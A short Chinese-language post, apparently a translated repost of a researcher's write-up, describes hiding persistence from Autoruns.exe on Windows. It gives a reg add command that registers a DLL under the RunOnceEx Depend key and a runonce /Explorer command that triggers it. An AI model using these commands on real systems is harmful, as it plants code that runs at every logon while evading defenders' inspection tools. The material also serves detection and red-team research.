enter description here

视频演示:

使用RunOnceEx进行持久化 - 隐藏自Autoruns.exe

1.发现一种技术来执行DLL文件,而不会在登录时被autoruns.exe检测到。
需要管理员权限,不属于userland。

运行这个漏洞

1
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Users\demon\mbox.dll"

enter description here

2.mbox.dll将在下次登录时启动。或者你可以运行这个命令来触发执行:

1
runonce /Explorer 

链接(link):https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
https://support.microsoft.com/en-us/help/310593/description-of-the-runonceex-registry-key